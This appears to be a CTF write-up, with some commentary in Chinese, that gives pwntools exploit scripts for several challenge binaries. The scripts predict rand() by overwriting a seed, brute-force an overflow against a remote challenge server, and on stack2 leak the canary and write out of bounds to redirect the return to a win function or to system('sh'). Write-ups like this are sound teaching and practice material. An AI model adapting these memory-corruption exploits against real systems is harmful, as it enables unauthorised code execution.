from pwn import *
from ctypes import *

context.log_level = 'debug'

# The challenge draws its dice with libc rand(); instead of guessing, this
# script asks the host's own libc for the same sequence.
libc = CDLL('libc.so.6')
p = process('dice_game')

# Name answer: 0x40 bytes of padding followed by an 8-byte zero.
# NOTE(review): presumably the name buffer is 0x40 bytes and the value right
# after it is the seed handed to srand(), so this overwrites the seed with 0
# — confirm in the binary.
# NOTE(review): 'A'*0x40 is str while p64() returns bytes on Python 3
# pwntools; this concatenation only works under Python 2.
p.sendlineafter('let me know your name:','A'*0x40+p64(0))

# Fifty rounds: reproduce each draw locally and send it back.
# NOTE(review): no srand() is called on the host side, so rand() runs from
# its default state; glibc treats seed 0 the same as its default seed 1,
# which is what should make the two sequences line up — verify against the
# target's libc. rand() takes no parameters; the extra 0 is simply passed
# and, for a cdecl function, harmless.
for i in range(50):
    randvalue = libc.rand(0)%6+1
    p.sendlineafter('Give me the point(1~6):',str(randvalue))

p.interactive()
from pwn import * # context.log_level = 'debug' end_flag = 0# when the flag got,the end_flag => 1 ,means the loop ends for i in range(70,100): if end_flag==1: break log.info('testing padding = '+str(i)) p = remote('111.198.29.45',30599) p.recvuntil('WOW:') vuln_addr = int(p.recvline()[:-1],16) p.sendlineafter('>','A'*i+p64(vuln_addr)) try: flag = p.recvline() print(flag) end_flag = 1 except: pass p.close()
from pwn import *
context.log_level = 'debug'
p = process('./forgot')

# NOTE(review): unused below; 0x1c + 4 + 0x48 == 0x68, so this records the
# offset at which the trailing p32(10) lands in the payload.
padding = 0x68
# Address taken from the binary; the name suggests the flag-printing
# function — confirm in the disassembly.
getflag_addr = 0x080486CC

p.sendlineafter('name?','wh4lter')
# Payload layout: 0x1c bytes of padding, getflag_addr, 0x48 more bytes of
# padding, then the integer 10.
# NOTE(review): what the 0x48 gap and the trailing 10 correspond to is not
# shown on this page — confirm against the binary's stack layout.
# NOTE(review): str + bytes concatenation (p32() returns bytes on Python 3);
# this only runs under Python 2 pwntools.
p.sendlineafter('Enter the string to be validate','A'*0x1c+p32(getflag_addr)+'A'*0x48+p32(10))
p.interactive()
0x03 stack2
分析
开了Canary,第一反应想办法爆出Canary
看IDA,自带了一个hackhere函数,那很显然,改EIP指向它就行了
这里可以通过给的change number功能修改栈中数据
/* "change number" menu option: read an index and a value and store it. */
puts("which number to change:");
__isoc99_scanf("%d", &count);
puts("new number:");
__isoc99_scanf("%d", &number);
/* No bounds check on count: any index relative to v13, negative or past the
 * end of the array, is written. This is the primitive the scripts below use
 * (they write indices 0x84..0x87 to redirect the return address). */
v13[count] = number;
puts("***********************************************************");
puts("* An easy calc *");
puts("*Give me your numbers and I will return to you an average *");
puts("*(0 <= x < 256) *");
puts("***********************************************************");
puts("How many numbers you have:");
/* count is read unchecked; it is only clamped for the input loop below. */
__isoc99_scanf("%d", &count);
puts("Give me your numbers");
/* The input loop stops after 100 entries even when count is larger, so
 * count can exceed the number of slots actually filled.
 * ("(signedint)" is "(signed int)" with the space lost in extraction.) */
for ( i = 0; i < count && (signedint)i <= 99; ++i )
{
    __isoc99_scanf("%d", &number);
    v13[i] = number;
}
...
/* ("(longdouble)" is "(long double)" with the space lost in extraction.) */
for ( j = count; ; printf("average is %.2lf\n", (double)((longdouble)v9 / (double)j)) )
...
puts("id\t\tnumber");
/* The echo loop is bounded by j (== count), not by the 100 entries read:
 * with a count above 100 it prints memory past the array, which is how the
 * canary bytes at indices 100..103 are read back below. */
for ( k = 0; k < j; ++k )
    printf("%d\t\t%d\n", k, v13[k]);
...
p.sendlineafter('have:',str(255))#我甚至老实地小于了256 for i in range(100): p.sendline(str(1))
p.sendlineafter('exit\n','1')
#get canary canary = '' for i in range(100,104): p.recvuntil(str(i)+'\t\t') value = int(p.recvuntil('\n')[:-1]) if value < 0: value = 256+value canary = hex(value)[2:].rjust(2,'0')+canary canary = int(canary,16) success('canary:'+hex(canary))
ret2hackhere
from pwn import *
context.log_level = 'debug'
p = process('stack2')

# Declare and send a single number so the menu loop is reached.
p.sendlineafter('have:',str(1))
for i in range(1):
    p.sendline(str(1))

# Address of the binary's hackhere function (taken from IDA).
hackhere_addr = 0x0804859b
# Menu option 3 ("change number") writes one byte per call; indices
# 0x84..0x87 are the four bytes of the saved return address, written
# low byte first.
# NOTE(review): the 0x84 offset comes from the binary's stack layout and is
# not derived on this page — confirm it.
for i in range(0x84,0x84+4):
    p.sendlineafter('exit\n','3')
    new_number = hackhere_addr & 0xFF
    hackhere_addr = hackhere_addr >> 8  # consumed byte by byte
    p.sendlineafter('which number to change:\n',str(i))
    p.sendlineafter('new number:\n',str(new_number))
# NOTE(review): the lines shown end here without selecting the menu's exit
# option or calling p.interactive(), so the rewritten return address is
# never exercised in this excerpt — presumably the script continues.
from pwn import *
context.log_level = 'debug'
p = process('stack2')

# Declare and send a single number so the menu loop is reached.
p.sendlineafter('have:',str(1))
for i in range(1):
    p.sendline(str(1))

# PLT entry of system() in the binary (from IDA).
system_plt = 0x08048450
# Menu option 3 ("change number") writes one byte per call; indices
# 0x84..0x87 are the four bytes of the saved return address, low byte first.
# NOTE(review): the 0x84 offset comes from the binary's stack layout — confirm.
for i in range(0x84,0x84+4):
    p.sendlineafter('exit\n','3')
    new_number = system_plt & 0xFF
    system_plt = system_plt >> 8  # consumed byte by byte
    p.sendlineafter('which number to change:\n',str(i))
    p.sendlineafter('new number:\n',str(new_number))

# Address of a string in the binary used as system()'s argument
# (presumably "sh" — confirm in IDA).
sh_addr = 0x08048987
# Indices 0x8c..0x8f hold the first argument; 0x88..0x8b are skipped and
# serve as the return-address slot of the system() call, consistent with
# the 32-bit calling convention.
for i in range(0x84+8,0x84+12):
    p.sendlineafter('exit\n','3')
    new_number = sh_addr & 0xFF
    sh_addr = sh_addr >> 8  # consumed byte by byte
    p.sendlineafter('which number to change:\n',str(i))
    p.sendlineafter('new number:\n',str(new_number))
# NOTE(review): no exit option is sent before handing over the terminal, so
# the menu has to be left manually in the interactive session for the
# function to return — presumably intentional.
p.interactive()